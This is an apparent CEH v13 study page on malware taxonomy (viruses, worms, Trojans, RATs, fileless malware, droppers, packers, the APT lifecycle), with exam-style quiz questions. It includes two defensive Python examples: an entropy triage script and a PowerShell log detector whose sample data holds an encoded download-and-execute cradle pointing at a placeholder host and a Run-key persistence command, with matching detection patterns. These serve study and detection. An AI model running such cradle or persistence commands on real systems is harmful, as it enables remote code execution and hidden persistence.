4.1 Malware Concepts and Taxonomy

Key Takeaways

  • CEH v13 treats Malware Threats as a heavy module (~10-14% of the exam); you classify a sample by behavior — replication, propagation, and intent — not by brand name.
  • A worm self-propagates across networks with no user action, while a virus needs a host file and a user to execute it.
  • Trojans rely on disguise and social trust rather than self-replication, and frequently deliver a Remote Access Trojan (RAT) backdoor for full remote control.
  • Modern malware is modular: a dropper/downloader stages the environment, the payload performs the objective, and a packer or crypter evades signature detection.
  • Fileless malware lives in memory and abuses trusted tools (PowerShell, WMI, registry), and a botnet is a network of compromised bots driven by a command-and-control (C2) server.
Last updated: June 2026

Why Malware Taxonomy Matters on CEH

The Certified Ethical Hacker (CEH) v13 exam treats malware as a classification problem first. Questions rarely ask you to write malicious code; they describe a behavior — "spreads automatically across the network with no user action" or "runs entirely in memory using PowerShell" — and ask you to name the category, the propagation method, or the correct kit component. Malware Threats is one of the heaviest modules on the exam (roughly 10-14% of theory items, plus multiple flags on the CEH Practical), so getting the taxonomy right pays off across many questions.

The single most useful distinction is how a sample replicates and propagates. A virus attaches itself to a host file or document and only runs when a user executes that host; it then infects other files on the same system. A worm is self-propagating — it copies itself across a network by exploiting a service or weak credential, requiring no user interaction (the 2017 WannaCry worm spread via the EternalBlue SMB exploit). A Trojan does not self-replicate at all: it disguises itself as legitimate software so the victim installs it voluntarily, then performs hidden malicious actions.

When a CEH scenario stresses automatic network-wide spread, the answer is worm; when it stresses a malicious file masquerading as something useful, the answer is Trojan.

The Major Malware Families

| Type | Defining behavior | Needs user action? | Self-replicates? |
|---|---|---|---|
| Virus | Attaches to a host file; infects other files | Yes (run host) | Yes (locally) |
| Worm | Spreads itself across networks via exploits | No | Yes (network) |
| Trojan | Disguised as legitimate software; hidden payload | Yes (install) | No |
| Ransomware | Encrypts files; demands payment for the key | Often via phishing | No |
| Rootkit | Hides malware/attacker with admin-level stealth | No | No |
| RAT | Remote Access Trojan — full remote control via C2 | Yes (install) | No |
| Fileless | Lives in memory; abuses PowerShell/WMI/registry | Often via doc macro | No |
| Botnet | Network of bots controlled by a C2 server | Varies | Varies |

Ransomware denies access to data by encrypting it and demands payment (usually cryptocurrency) for the decryption key; modern strains add double extortion (steal data first, then threaten to leak it). A rootkit is a toolkit that gains and hides administrative (kernel- or user-mode) access, concealing processes, files, and network connections from the operating system and defenders. A Remote Access Trojan (RAT) gives an attacker interactive remote control — keylogging, screen capture, file transfer, webcam access — and is a frequent Trojan payload.

Spyware/keyloggers quietly harvest credentials and keystrokes, while adware forces unwanted ads. A botnet is a collection of compromised hosts ("bots" or "zombies") that an attacker commands through a command-and-control (C2) channel to launch DDoS attacks, send spam, or mine cryptocurrency.

Malware Kit Components and the APT Lifecycle

Modern malware is modular, and CEH tests the parts by job:

  • Dropper — a stub that carries and installs the malicious payload it already contains.
  • Downloader — a small first-stage stub that retrieves the full payload from an attacker server.
  • Payload — the code that performs the actual objective (encrypt, exfiltrate, backdoor).
  • Packer / crypter — compresses or encrypts the binary so its signature changes, defeating static antivirus.
  • Wrapper / binder — joins the malicious payload to a legitimate program so the victim runs both.
  • Exploit — the vulnerability-trigger that gains initial code execution.

Fileless malware deserves special attention: it executes directly in memory by abusing trusted, signed system tools — PowerShell, WMI (Windows Management Instrumentation), and the registry — a tactic called living off the land, using so-called LOLBins (living-off-the-land binaries). Because no malicious file lands on disk, signature scanning misses it, which is why CEH stresses behavioral detection here.
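
The behavioral detection the paragraph calls for, as an added example that is not part of the CEH material or this page: it runs over constructed PowerShell script-block log text, decodes any -EncodedCommand argument (base64 over UTF-16LE) and flags download cradles plus registry and WMI persistence. The sample blocks, indicator labels, regexes and the two-hit threshold are assumptions of this example.

```python
import base64
import re

# Constructed script-block text shaped like PowerShell Event ID 4104 entries
# (Script Block Logging). Sample data for this example, not real telemetry.
CRADLE_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "powershell.exe -nop -w hidden -EncodedCommand "
    + base64.b64encode(CRADLE_PLAINTEXT.encode("utf-16-le")).decode("ascii"),
    "Set-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
    "-Name Updater -Value 'wscript.exe C:\\Temp\\u.vbs'",
    "Get-CimInstance Win32_OperatingSystem | Select-Object Caption",
]

# Behavioral indicators as (label, case-insensitive regex); labels are this example's own.
INDICATORS = [
    ("encoded_command", r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}"),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden"),
    ("download_cradle", r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"),
    ("invoke_expression", r"\bIEX\b|Invoke-Expression"),
    ("run_key_persistence", r"CurrentVersion\\Run(?:Once)?\b"),
    ("wmi_persistence", r"__EventFilter|CommandLineEventConsumer|Register-WmiEvent"),
]
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(block: str):
    """Decode a -EncodedCommand argument (base64 over UTF-16LE), or None."""
    m = ENCODED_RE.search(block)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_block(block: str) -> dict:
    """Score the literal text plus any decoded payload, not the base64 blob."""
    decoded = decode_encoded_command(block)
    text = block if decoded is None else block + "\n" + decoded
    hits = [label for label, pat in INDICATORS if re.search(pat, text, re.I)]
    persistence = any(h.endswith("_persistence") for h in hits)
    return {"decoded": decoded, "indicators": hits, "suspicious": persistence or len(hits) >= 2}


if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        result = analyze_block(block)
        print(result["suspicious"], result["indicators"])
```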

For sophisticated, long-term intrusions, CEH tests the Advanced Persistent Threat (APT) lifecycle. The EC-Council sequence is: (1) Preparation (define and research the target, build tools), (2) Initial Intrusion (often spear-phishing to gain a foothold), (3) Expansion (lateral movement to more systems and higher privilege), (4) Persistence (maintain access and evade endpoint security), (5) Search and Exfiltration (locate and steal valuable data), and (6) Cleanup (cover tracks, remove evidence).

APTs are defined by being advanced (custom tooling), persistent (low-and-slow, long dwell time), and a threat (well-resourced, often nation-state actors). Recognizing the phase a scenario describes is a common exam pattern.

Distribution, Persistence, and Exam Traps

CEH also expects you to know how malware reaches a system and how it survives a reboot. Common distribution vectors are phishing email attachments and links, drive-by downloads from compromised or malicious sites, malvertising, trojanized software and pirated installers, infected removable media (USB), and supply-chain compromise of trusted updates.

Once executed, malware establishes persistence so it restarts after reboot: registry Run/RunOnce keys, scheduled tasks, Windows services, startup folders, WMI event subscriptions, and on Linux cron jobs, systemd units, or modified rc scripts. Rootkits push persistence into the kernel or boot process (bootkits) to load before defenses.

Watch for these frequently tested distinctions and traps:

  • Virus vs worm — replication that needs a host file and a user (virus) versus self-propagation across the network (worm). This is the most common trick question.
  • Trojan vs virus/worm — a Trojan does not replicate; it relies on disguise. A RAT is a type of Trojan, not a separate replication class.
  • Polymorphic vs metamorphic — a polymorphic virus encrypts its body with a changing key while its decryptor stays largely constant, whereas a metamorphic virus rewrites its own code each generation with no constant decryptor, making it the harder of the two to signature.
  • Crypter vs packer — both obscure a binary; a packer primarily compresses (UPX), a crypter primarily encrypts to evade AV. Both defeat static signatures, not behavioral detection.
  • Logic bomb — code that triggers on a condition (a date, an event), often planted by a malicious insider.
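
The entropy triage analysts use to spot packed or crypted sections, as an added example that is not from the page: Shannon entropy over constructed section bytes. The keystream_xor helper is a stand-in for a crypter's body encryption and the 7.0 threshold is an assumption; the single-byte XOR case shows that a constant XOR leaves the byte histogram, and so the entropy, unchanged, one reason static heuristics need behavioral backup.

```python
import hashlib
import math


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for one repeated value, 8.0 for a uniform spread."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def keystream_xor(data: bytes, key: bytes) -> bytes:
    """Stand-in for a crypter's body encryption: a SHA-256 counter keystream
    XORed over the section. Deterministic so the example is repeatable."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + i.to_bytes(4, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


# Constructed "sections": readable code-like text, the same bytes XORed with
# one constant, and the same bytes under the keystream above.
TEXT_SECTION = b"mov eax, [ebp+8]; call CreateFileW; ret\n" * 100
SINGLE_BYTE_XOR = bytes(b ^ 0x5A for b in TEXT_SECTION)
CRYPTED_SECTION = keystream_xor(TEXT_SECTION, b"example-key")


def classify_section(data: bytes, threshold: float = 7.0) -> str:
    """Entropy-only triage. 'high' means compressed or encrypted, which also
    covers legitimate packed resources, so it is a lead, not a verdict."""
    return "high" if shannon_entropy(data) >= threshold else "low"


if __name__ == "__main__":
    for name, sec in (("text", TEXT_SECTION), ("xor-1byte", SINGLE_BYTE_XOR),
                      ("crypted", CRYPTED_SECTION)):
        print(f"{name:10} {shannon_entropy(sec):.2f} {classify_section(sec)}")
```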

A quick reference for the families and their headline trait:

| Family | Headline trait you must recall |
|---|---|
| Worm | Self-spreads, no user action |
| Virus | Infects host files, needs execution |
| Trojan | Disguise, no self-replication |
| Ransomware | Encrypts data, demands ransom |
| Rootkit | Stealthy admin-level hiding |
| Botnet | Many bots under one C2 |

Nailing these distinctions is what separates a confident answer from a guess on the malware questions.

Test Your Knowledge

Malware spreads automatically to hundreds of hosts across a network by exploiting an unpatched remote service. No user opened a file or clicked a link. Which category best fits?

Test Your Knowledge

An analyst finds no malicious executable on disk, yet PowerShell and WMI were used to run code in memory and modify registry keys for persistence. What is this?

Test Your Knowledge

Which component is the small first-stage stub whose main job is to retrieve the full malicious payload from an attacker-controlled server?

Test Your Knowledge

Name the APT lifecycle phase that follows Initial Intrusion and Expansion, in which the attacker focuses on keeping access while evading endpoint security?
